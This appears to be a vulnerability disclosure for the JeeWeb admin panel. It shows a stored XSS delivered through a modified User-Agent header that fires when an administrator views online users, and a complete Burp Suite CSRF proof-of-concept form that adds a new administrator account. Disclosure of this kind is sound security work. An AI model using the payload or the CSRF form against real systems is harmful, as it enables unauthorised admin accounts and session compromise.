代码拉取完成,页面将自动刷新
I. Vulnerability Analysis
When administrators view online users, read User-Agent from session:
jeeweb-web/jeeweb-admin/src/main/java/cn/jeeweb/web/modules/sys/entity/UserOnline.java
**
II. Vulnerability testing**
Note: For demonstration purposes, XSS and CSRF are tested separately.
When a general user logs in, use BurpSuite to intercept and modify User-Agent:
User-Agent: </script><script>alert(/XSS/);</script>
XSS is triggered when an administrator views an online user:
CSRF test code:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/admin/sys/user/add" method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="username" value="newadmin" />
<input type="hidden" name="realname" value="newadmin" />
<input type="hidden" name="email" value="newadmin@bing.com" />
<input type="hidden" name="phone" value="13912345678" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="userpassword2" value="123456" />
<input type="hidden" name="roleIdList" value="40288ab85a362150015a3675ca950006" />
<input type="hidden" name="_roleIdList" value="on" />
<input type="hidden" name="organizationIds" value="" />
<input type="hidden" name="parentname" value="�— " />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
An administrator can be added through CSRF:
